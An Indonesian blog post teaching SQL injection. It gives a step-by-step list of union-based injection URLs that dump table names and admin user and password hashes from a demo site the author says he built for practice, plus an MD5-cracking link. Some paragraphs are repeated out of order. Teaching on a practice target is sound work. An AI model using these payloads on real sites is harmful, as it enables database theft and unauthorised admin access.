Minggu siang mata sayup sayup mengantuk terbangun mendengar hpku bersin, Ku baca sms dari 2 teman bertanya langkah untuk melakukan sql injection dalam pembahasan presentasi Wah bingung aku menjawabnya. Hingga tersirat untuk memposting tulisan ini semoga bisa membantu kalian sobat sekalian naikin trafik dan promo jasa juga hehe. Baik kita bicarakan dulu apa sih sql injection ? Dalam dunia web sql injection menjadi monster misterius. Mengapa bisa demikian ? Secara gampang SQL Injection merupakan sebuah aksi hacking yang dilakukan di aplikasi client (browser pengunjung) dengan cara memodifikasi perintah SQL yang ada dimemori aplikasi client. Jika kita lebih masuk kedalam pengertian SQL Injection merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk menyimpan data.
Dengan demikian kesimpulanya apa ? SQL Injection adalah teknik hacking yang memanfaatkan perintah sql. Kemudian apa yang diserang ? Karena kita memanfaatkan perintah sql maka yang diserang adalah database. Bagaimana untuk melakukan itu pada database, kan kita tidak bisa mengakses database tersebut ? Justru dengan sql injection itulah kita melakukan semua itu.
Berikut adalah langkah untuk melakukan injection pada sekom.net23.net :
Setelah sobat melakukan semua langkah diatas nanti akan ketemu user dan password untuk masuk halaman admin yang beralamat http://sekom.net23.net/sql_injection/administrator/ namun terenkripsi MD5 untuk memecahnya gunakan :
WARNING ! sekom.net23.net tidak akan selamanya online karena dihostingkan gratis. Jika sobat menginginkan web demo tersebut untuk dipelajari bahkan dibedah atau link tutorial tidak berfungsi silahkan hubungi saya (085642760001) ...
Dengan demikian kesimpulanya apa ? SQL Injection adalah teknik hacking yang memanfaatkan perintah sql. Kemudian apa yang diserang ? Karena kita memanfaatkan perintah sql maka yang diserang adalah database. Bagaimana untuk melakukan itu pada database, kan kita tidak bisa mengakses database tersebut ? Justru dengan sql injection itulah kita melakukan semua itu.
Berikut adalah langkah untuk melakukan injection pada sekom.net23.net :
Mencari bug dengan memeriksa filter http://sekom.net23.net/sql_injection/index.php?id=1' Pengecekan logika http://sekom.net23.net/sql_injection/index.php?id=1+and+1=1-- [true] http://sekom.net23.net/sql_injection/index.php?id=1+and+1=2-- [false] Mencari kolom yang bisa di inject http://sekom.net23.net/sql_injection/index.php?id=1+order+by+6-- [urut dari 1] Mencari angka unik http://sekom.net23.net/sql_injection/index.php?id=-1+union+select+1,2,3,4,5-- Mencari informasi database http://sekom.net23.net/sql_injection/index.php?id=-1+union+select+1,database(),3,4,5-- Mencari informasi versi http://sekom.net23.net/sql_injection/index.php?id=-1+union+select+1,user(),vertion(),4,5-- http://sekom.net23.net/sql_injection/index.php?id=-1+union+select+1,concat(user(),0x3a,database()),version(),4,5-- http://sekom.net23.net/sql_injection/index.php?id=-1+union+select+1,2,table_name,4,5+from+information_schema.tables+where+table_schema=database()+limit+0,1-- http://sekom.net23.net/sql_injection/index.php?id=-1+union+select+1,2,table_name,4,5+from+information_schema.tables+where+table_schema=database()+limit+1,1-- http://sekom.net23.net/sql_injection/index.php?id=-1+union+select+1,column_name,3,4,5+from+information_schema.columns+where+table_name='table_user'+limit+0,1-- http://sekom.net23.net/sql_injection/index.php?id=-1+union+select+1,2,column_name,4,5+from+information_schema.columns+where+table_name=0x7461626c655f75736572+limit+0,1-- http://sekom.net23.net/sql_injection/index.php?id=-4+union+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_name=0x7461626c655f75736572-- http://sekom.net23.net/sql_injection/index.php?id=-4+union+select+1,database(),concat(user_id,password_id),4,5+from+table_user-- http://sekom.net23.net/sql_injection/index.php?id=-4+union+select+1,2,group_concat(user_id,0x3a,password_id),4,5+from+table_user
Setelah sobat melakukan semua langkah diatas nanti akan ketemu user dan password untuk masuk halaman admin yang beralamat http://sekom.net23.net/sql_injection/administrator/ namun terenkripsi MD5 untuk memecahnya gunakan :
conversi MD5 : http://md5master.com/index.php?action=decryptsitus sekom.net23.net adalah web simulasi yang sudah aku persiapkan untuk kita hack dengan sql injection. Langkah diatas adalah langkah jadi yang tidak secara detail aku jelaskan bagaimana untuk proses itu bisa terjadi. Silahkan tinggalkan pertanyaan di komen posting ini untuk diskusi bersama. Ow Iya sobat web simulasi diatas bukan cuma untuk sql injection demo silahkan gunakan menu disebalah kanan menjelajah.
WARNING ! sekom.net23.net tidak akan selamanya online karena dihostingkan gratis. Jika sobat menginginkan web demo tersebut untuk dipelajari bahkan dibedah atau link tutorial tidak berfungsi silahkan hubungi saya (085642760001) ...
0 Response to "Demo Langkah SQL Injection"
Post a Comment